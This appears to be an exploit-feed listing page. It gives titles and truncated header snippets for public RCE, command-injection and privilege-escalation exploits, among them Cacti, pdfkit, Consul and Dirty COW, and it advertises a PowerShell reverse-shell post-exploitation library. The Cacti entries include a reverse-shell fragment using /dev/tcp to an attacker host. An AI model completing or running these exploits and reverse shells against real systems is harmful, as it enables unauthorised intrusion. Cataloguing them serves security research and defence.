PowerMeUp - A Small Library Of Powershell Scripts For Post Exploitation That You May Need Or Use!

This is a powershell reverse shell that executes the commands and or scripts that you add to the powerreverse.ps1 file as well as a small library of Post-Exploitation scripts. This also can be used for post exploitation and lateral movement even. Please use at your own risk I am not and will not ...

KODExplorer 4.49 Cross Site Request Forgery / Shell Upload

Exploit Title: KodExplorer ' path = '/data/User/admin/home/' targetpath = input' Target KODExplorer path ex /var/www...

Exploit for Code Injection in Vmware Spring_Cloud_Function

Spring Cloud Function Vulnerability CVE-2022-22963 RCE This...

Exploit for Missing Authentication for Critical Function in F5 Big-Ip_Access_Policy_Manager

Tippa My Tongue Tippa My Tongue is an exploit that uses CVE-2...

BrainyCP 1.0 Remote Code Execution

Exploit Title: BrainyCP V1.0 - Remote Code Execution Date: 2023-04-03 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://brainycp.io Demo: https://demo.brainycp.io Tested on: Kali Linux CVE : N/A import requests credentials url = input"URL: " username = input"Username: " password =...

BrainyCP V1.0 - Remote Code Execution Exploit

Exploit Title: BrainyCP V1.0 - Remote Code Execution Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://brainycp.io Demo: https://demo.brainycp.io Tested on: Kali Linux CVE : N/A import requests credentials url = input"URL: " username = input"Username: " password = input"Password: " ip =...

WIMAX SWC-5100W Remote Command Execution

Exploit Title: WIMAX SWC-5100W Firmware V1.11.0.1 :1.9.9.4 - Authenticated RCE Vulnerability Name: Ballin' Mada Date: 4/3/2023 Exploit Author: Momen Eldawakhly Cyber Guy Vendor Homepage: http://www.seowonintech.co.kr/eng/main Version: Bootloader1.18.19.0 , HW 0.0.7.0, FW1.11.0.1 : 1.9.9.4 Tested...

WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated Remote Code Execution Exploit

Exploit Title: WIMAX SWC-5100W Firmware V1.11.0.1 :1.9.9.4 - Authenticated RCE Vulnerability Name: Ballin' Mada Exploit Author: Momen Eldawakhly Cyber Guy Vendor Homepage: http://www.seowonintech.co.kr/eng/main Version: Bootloader1.18.19.0 , HW 0.0.7.0, FW1.11.0.1 : 1.9.9.4 Tested on: Unix CVE :...

pdfkit v0.8.7.2 - Command Injection Exploit

!/usr/bin/env python3 Exploit Title: pdfkit v0.8.7.2 - Command Injection Date: 02/23/2023 Exploit Author: UNICORD NicPWNs & Dev-Yeoj Vendor Homepage: https://pdfkit.org/ Software Link: https://github.com/pdfkit/pdfkit Version: 0.0.0-0.8.7.2 Tested on: pdfkit 0.8.6 CVE: CVE-2022–25765 Source:...

pdfkit v0.8.7.2 - Command Injection

!/usr/bin/env python3 Exploit Title: pdfkit v0.8.7.2 - Command Injection Date: 02/23/2023 Exploit Author: UNICORD NicPWNs & Dev-Yeoj Vendor Homepage: https://pdfkit.org/ Software Link: https://github.com/pdfkit/pdfkit Version: 0.0.0-0.8.7.2 Tested on: pdfkit 0.8.6 CVE: CVE-2022–25765 Source:...

PhotoShow 3.0 - Remote Code Execution Exploit

Exploit Title: PhotoShow 3.0 - Remote Code Execution Date: January 11, 2023 Exploit Author: LSCP Responsible Disclosure Lab Detailed Bug Description: https://lscp.llc/index.php/2021/07/19/how-white-box-hacking-works-remote-code-execution-and-stored-xss-in-photoshow-3-0/ Vendor Homepage:...

Cacti 1.2.22 Remote Command Execution

Exploit Title: Cacti v1.2.22 - Remote Command Execution RCE Exploit Author: Riadh BOUCHAHOUA Discovery Date: 2022-12-08 Vendor Homepage: https://www.cacti.net/ Software Links : https://github.com/Cacti/cacti Tested Version: 1.2.2x /dev/tcp/self.rshost/self.rsport &1'" import base64 b64revshell =...

Cacti v1.2.22 - Remote Command Execution Exploit

Exploit Title: Cacti v1.2.22 - Remote Command Execution RCE Exploit Author: Riadh BOUCHAHOUA Vendor Homepage: https://www.cacti.net/ Software Links : https://github.com/Cacti/cacti Tested Version: 1.2.2x /dev/tcp/self.rshost/self.rsport &1'" import base64 b64revshell =...

Judging Management System v1.0 - Remote Code Execution Exploit

Exploit Title: Judging Management System v1.0 - Remote Code Execution RCE Exploit Author: Angelo Pio Amirante Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html Version: 1.0...

4images 1.9 - Remote Command Execution Vulnerability

Exploit Title: 4images 1.9 - Remote Command Execution RCE Exploit Author: Andrey Stoykov Software Link: https://www.4homepages.de/download-4images Version: 1.9 Tested on: Ubuntu 20.04 To reproduce do the following: 1. Login as administrator user 2. Browse to "General" - " Edit Templates" - "Selec...

4images 1.9 - Remote Command Execution (RCE)

Exploit Title: 4images 1.9 - Remote Command Execution RCE Exploit Author: Andrey Stoykov Software Link: https://www.4homepages.de/download-4images Version: 1.9 Tested on: Ubuntu 20.04 To reproduce do the following: 1. Login as administrator user 2. Browse to "General" - " Edit Templates" - "Selec...

Exploit for Race Condition in Canonical Ubuntu_Linux

This repository is a proof-of-concept PoC for the Dirty COW CVE-2016-5195 vulnerability. The PoC relies on ptrace to patch the vDSO Virtual Dynamic Shared Object instead of modifying filesystem binaries. This approach has several advantages, including no setuid binary required, SELinux bypass,...

Hashicorp Consul 1.0 Remote Command Execution

Exploit Title: Hashicorp Consul v1.0 - Remote Command Execution RCE Date: 26/10/2022 Exploit Author: GatoGamer1155, 0bfxgh0st Vendor Homepage: https://www.consul.io/ Description: Exploit for gain reverse shell on Remote Command Execution via API References:...

Hashicorp Consul v1.0 - Remote Command Execution Exploit

Exploit Title: Hashicorp Consul v1.0 - Remote Command Execution RCE Exploit Author: GatoGamer1155, 0bfxgh0st Vendor Homepage: https://www.consul.io/ Description: Exploit for gain reverse shell on Remote Command Execution via API References: https://www.consul.io/api/agent/service.html Tested on:...

Hashicorp Consul v1.0 - Remote Command Execution (RCE)

Exploit Title: Hashicorp Consul v1.0 - Remote Command Execution RCE Date: 26/10/2022 Exploit Author: GatoGamer1155, 0bfxgh0st Vendor Homepage: https://www.consul.io/ Description: Exploit for gain reverse shell on Remote Command Execution via API References:...